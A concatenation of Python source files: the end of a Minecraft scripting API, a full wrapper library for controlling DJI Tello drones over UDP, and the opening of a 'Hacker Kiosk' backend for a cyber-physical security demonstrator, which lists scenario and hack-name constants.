'radius': ['radius', 2, 10]})
WORLD.playEffect(location(r['x'], r['y'], r['z']), r['type'], r['data'], r['radius'])
@synchronous()
def sound(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, Sound.BLOCK_GLASS_BREAK],
'volume':['volume', 1, 1.0],
'pitch':['pitch', 2, 1.0]})
WORLD.playSound(location(r['x'], r['y'], r['z']), r['type'], r['volume'], r['pitch'])
@synchronous()
def tree(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'type':['type', 0, TreeType.TREE]})
WORLD.generateTree(location(r['x'], r['y'], r['z']), r['type'])
@synchronous()
def fireworks(*args, **kwargs):
r = parseargswithpos(args, kwargs, ledger={
'power':['power', 0, 3],
'builder':['builder', 1, None]})
if not r['builder']:
fwe = FireworkEffect.builder().withTrail().withColor(Color.BLUE, Color.RED).build()
fw = WORLD.spawnEntity(location(r['x'], r['y'], r['z']), EntityType.FIREWORK)
fwm = fw.getFireworkMeta()
fwm.addEffect(fwe)
fwm.setPower(r['power'])
fw.setFireworkMeta(fwm)
|
tello.py
|
"""Library for interacting with DJI Ryze Tello drones.
"""
# coding=utf-8
import logging
import socket
import time
from threading import Lock, Thread
from typing import Optional, Union, Type, Dict
from cv2 import add
from rospy import sleep
from .enforce_types import enforce_types
import av
import cv2 as cv
import numpy as np
import os
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
class TelloException(Exception):
pass
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
FRAME_GRAB_TIMEOUT = 5
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Constants for video settings
BITRATE_AUTO = 0
BITRATE_1MBPS = 1
BITRATE_2MBPS = 2
BITRATE_3MBPS = 3
BITRATE_4MBPS = 4
BITRATE_5MBPS = 5
RESOLUTION_480P = 'low'
RESOLUTION_720P = 'high'
FPS_5 = 'low'
FPS_15 = 'middle'
FPS_30 = 'high'
CAMERA_FORWARD = 0
CAMERA_DOWNWARD = 1
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key : int for key in INT_STATE_FIELDS}
state_field_converters.update({key : float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
state_update_callback=None,
av_open_lock=None,
video_frontend=None,
host=TELLO_IP,
retry_count=RETRY_COUNT,
):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
self.state_update_callback = state_update_callback
self.av_open_lock = av_open_lock
self.video_frontend = video_frontend
self.last_packet_received = 0
self.last_video_frame_received = 0
self.is_alive = False
if not threads_initialized:
# Run Tello command responses UDP receiver on background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
response_receiver_thread = Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}, 'drone': self}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
def get_own_udp_object(self):
"""Get own object from the global drones dict. This object is filled
with responses and state information by the receiver threads.
Internal method, you normally wouldn't call this yourself.
"""
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['drone'].last_packet_received = time.time()
drones[address]['responses'].append(data)
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
state = Tello.parse_state(data)
drones[address]['state'] = state
if drones[address]['drone'] is not None:
drones[address]['drone'].state_update_callback(state)
drones[address]['drone'].last_packet_received = time.time()
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise TelloException('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
float: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://0.0.0.0:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(port=self.video_stream_port)
return address
def get_frame_read(self, callback) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address, callback)
self.background_frame_read.start()
return self.background_frame_read
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT, robust: bool = False) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
bool/str: str with response text on success, False when unsuccessfull.
"""
# Commands very consecutive makes the drone not respond to them.
# So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
if robust:
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
first_response = responses.pop(0) # first datum from socket
try:
response = first_response.decode("utf-8")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return "response decode error"
response = response.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return "ok"
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT, robust:bool = False) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
response = self.send_command_with_return(command, timeout=timeout, robust=robust)
if robust:
for i in range(0, self.retry_count):
if 'ok' in response.lower():
self.is_alive = True
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
return True
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
"""Used to reaise an error after an unsuccessful command
Internal method, you normally wouldn't call this yourself.
"""
tries = 1 + self.retry_count
raise TelloException("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'"
.format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command", robust=True)
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise TelloException('Did not receive a state packet from the Tello')
def send_keepalive(self):
"""Send a keepalive packet to prevent the drone from landing after 15s
"""
self.send_control_command("keepalive")
def turn_motor_on(self):
"""Turn on motors without flying (mainly for cooling)
"""
self.send_control_command("motoron")
def turn_motor_off(self):
"""Turns off the motor cooling mode
"""
self.send_control_command("motoroff")
def initiate_throw_takeoff(self):
"""Allows you to take off by throwing your drone within 5 seconds of this command
"""
self.send_control_command("throwfly")
self.is_flying = True
def takeoff(self):
"""Automatic takeoff.
"""
# Something it takes a looooot of time to take off and return a succesful takeoff.
# So we better wait. Otherwise, it would give us an error on the following calls.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
when your computer is connected to Tello-XXXXXX WiFi ntwork).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_command_without_return("emergency")
self.is_flying = False
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
x: 1-3600
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
def set_wifi_credentials(self, ssid: str, password: str):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_control_command(cmd, robust=True)
def connect_to_wifi(self, ssid: str, password: str):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_control_command(cmd, robust=True)
def set_network_ports(self, state_packet_port: int, video_stream_port: int):
"""Sets the ports for state packets and video streaming
While you can use this command to reconfigure the Tello this library currently does not support
non-default ports (TODO!)
"""
self.video_stream_port = video_stream_port
cmd = 'port {} {}'.format(state_packet_port, video_stream_port)
self.send_control_command(cmd)
def reboot(self):
"""Reboots the drone
"""
self.send_command_without_return('reboot')
def set_video_bitrate(self, bitrate: int):
"""Sets the bitrate of the video stream
Use one of the following for the bitrate argument:
Tello.BITRATE_AUTO
Tello.BITRATE_1MBPS
Tello.BITRATE_2MBPS
Tello.BITRATE_3MBPS
Tello.BITRATE_4MBPS
Tello.BITRATE_5MBPS
"""
cmd = 'setbitrate {}'.format(bitrate)
self.send_control_command(cmd)
def set_video_resolution(self, resolution: str):
"""Sets the resolution of the video stream
Use one of the following for the resolution argument:
Tello.RESOLUTION_480P
Tello.RESOLUTION_720P
"""
cmd = 'setresolution {}'.format(resolution)
self.send_control_command(cmd)
def set_video_fps(self, fps: str):
"""Sets the frames per second of the video stream
Use one of the following for the fps argument:
Tello.FPS_5
Tello.FPS_15
Tello.FPS_30
"""
cmd = 'setfps {}'.format(fps)
self.send_control_command(cmd)
def set_video_direction(self, direction: int):
"""Selects one of the two cameras for video streaming
The forward camera is the regular 1080x720 color camera
The downward camera is a grey-only 320x240 IR-sensitive camera
Use one of the following for the direction argument:
Tello.CAMERA_FORWARD
Tello.CAMERA_DOWNWARD
"""
cmd = 'downvision {}'.format(direction)
self.send_control_command(cmd)
def send_expansion_command(self, expansion_cmd: str):
"""Sends a command to the ESP32 expansion board connected to a Tello Talent
Use e.g. tello.send_expansion_command("led 255 0 0") to turn the top led red.
"""
cmd = 'EXT {}'.format(expansion_cmd)
self.send_control_command(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def query_active(self) -> str:
"""Get the active status
Returns:
str
"""
return self.send_read_command('active?')
def end(self):
"""Call this method when you want to end the tello object
"""
try:
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
except TelloException:
pass
if self.background_frame_read is not None:
self.background_frame_read.stop()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class read frames using PyAV in background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address, callback):
self.tello = tello
self.address = address
self.frame = np.zeros([300, 400, 3], dtype=np.uint8)
self.video_frontend = tello.video_frontend
self.callback = callback
# Try grabbing frame with PyAV
# According to issue #90 the decoder might need some time
# https://github.com/damiafuentes/DJITelloPy/issues/90#issuecomment-855458905
# TODO check out parameters http://underpop.online.fr/f/ffmpeg/help/format-options.htm.gz
Tello.LOGGER.debug('trying to grab video frames...')
now = time.time()
if self.video_frontend == 'av':
with tello.av_open_lock:
self.container = av.open(self.address, format="h264")
elif self.video_frontend == 'opencv':
#os.environ['OPENCV_FFMPEG_CAPTURE_OPTIONS'] = 'preset:ultrafast;vcodec:libx264;tune:zerolatency;pixel_format:yuv420p;video_size:960x720'
self.container = cv.VideoCapture(self.address,cv.CAP_FFMPEG)
else:
Tello.LOGGER.error("Stopped video process!")
Tello.LOGGER.error("Unknown video_frontend (%s). It can be either 'opencv' or 'av'." % self.video_frontend)
return
Tello.LOGGER.info('dt %.4f' % (time.time() - now))
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
"""Start the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.worker.start()
def update_frame(self):
"""Thread worker function to retrieve frames using PyAV
Internal method, you normally wouldn't call this yourself.
"""
if self.video_frontend == 'av':
for frame in self.container.decode(video=0):
self.frame = np.array(frame.to_image())
self.callback(self.frame)
self.tello.last_video_frame_received = time.time()
self.is_alive = True
if self.stopped:
self.container.close()
break
elif self.video_frontend == 'opencv':
while True:
ret, frame = self.container.read()
self.frame = np.array(frame)
self.callback(self.frame)
self.tello.last_video_frame_received = time.time()
self.is_alive = True
if self.stopped:
self.container.release()
break
else:
raise Exception("Unsupported video frontend: %s" % self.video_frontend)
def stop(self):
"""Stop the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.stopped = True
|
kiosk.py
|
"""
Project: SSITH CyberPhysical Demonstrator
director.py
Author: Ethan Lew <elew@galois.com>
Date: 06/09/2021
Python 3.8.3
O/S: Windows 10
Kiosk State Machine
Hacker Kiosk backend
Exchange format:
{
func: "name-of-the-function-to-be-called",
args: {"dictionary of arguments}
resp: {"dictionary of return vaues}
status: response status
200 -OK
500 - unexpected failure
501 - func not implemented
}
NOTE: Scenarios are:
1) BASELINE
* Target1 (ECU) + Target4 (Debian) + Infotainment_server_1
2) SECURE_INFOTAINMENT
* Target2 (ECU) + Target5 (Debian, secure!) + Infotainment_server_2
3) SECURE_ECU
* Target3 (ECU, secure!) + Target6 (Debian) + Infotainment_server_3
"""
import cyberphyslib.kiosk.client as kclient
import cyberphyslib.canlib as canlib
from can import Message
from transitions.extensions import GraphMachine as Machine
from transitions import State
import threading
import zmq
import struct
import subprocess
def page(f):
"""decorator for page action methods"""
def inner(*args, **kwargs):
"""NOTE: make this log instead of print"""
print(f">>>STATE: {f.__name__}")
return f(*args, **kwargs)
return inner
ComponentDictionary = {
canlib.SCENARIO_BASELINE: "SCENARIO_BASELINE",
canlib.SCENARIO_SECURE_ECU: "SCENARIO_SECURE_ECU",
canlib.SCENARIO_SECURE_INFOTAINMENT: "SCENARIO_SECURE_INFOTAINMENT",
canlib.BESSPIN_TOOL: "BESSPIN_TOOL",
canlib.TARGET_1: "TARGET_1",
canlib.TARGET_2: "TARGET_2",
canlib.TARGET_3: "TARGET_3",
canlib.TARGET_4: "TARGET_4",
canlib.TARGET_5: "TARGET_5",
canlib.TARGET_6: "TARGET_6",
canlib.TEENSY: "TEENSY",
canlib.IGNITION: "IGNITION",
canlib.LED_COMPONENT: "LED_COMPONENT",
canlib.HACKER_KIOSK: "HACKER_KIOSK",
canlib.HACK_NONE: "HACK_NONE",
canlib.HACK_OTA: "HACK_OTA",
canlib.HACK_BRAKE: "HACK_BRAKE",
canlib.HACK_THROTTLE: "HACK_THROTTLE",
canlib.HACK_TRANSMISSION: "HACK_TRANSMISSION",
canlib.HACK_LKAS: "HACK_LKAS",
canlib.HACK_INFOTAINMENT_1: "HACK_INFOTAINMENT_1",
canlib.HACK_INFOTAINMENT_2: "HACK_INFOTAINMENT_2",
canlib.INFOTAINMENT_THIN_CLIENT: "INFOTAINMENT_THIN_CLIENT",
canlib.INFOTAINMENT_SERVER_1: "INFOTAINMENT_SERVER_1",
canlib.INFOTAINMENT_SERVER_2: "INFOTAINMENT_SERVER_2",
canlib.INFOTAINMENT_SERVER_3: "INFOTAINMENT_SERVER_3",
canlib.OTA_UPDATE_SERVER_1: "OTA_UPDATE_SERVER_1",
canlib.OTA_UPDATE_SERVER_2: "OTA_UPDATE_SERVER_2",
canlib.OTA_UPDATE_SERVER_3: "OTA_UPDATE_SERVER_3",
canlib.BUTTON_STATION_1: "BUTTON_STATION_1",
canlib.BUTTON_STATION_2: "BUTTON_STATION_2",
canlib.BUTTON_STATION_3: "BUTTON_STATION_3",
canlib.BUTTON_VOLUME_DOWN: "BUTTON_VOLUME_DOWN",
canlib.BUTTON_VOLUME_UP: "BUTTON_VOLUME_UP"
}
ButtonDictionary = {
canlib.BUTTON_STATION_1: "BUTTON_STATION_1",
canlib.BUTTON_STATION_2: "BUTTON_STATION_2",
canlib.BUTTON_STATION_3: "BUTTON_STATION_3",
canlib.BUTTON_VOLUME_DOWN: "BUTTON_VOLUME_DOWN",
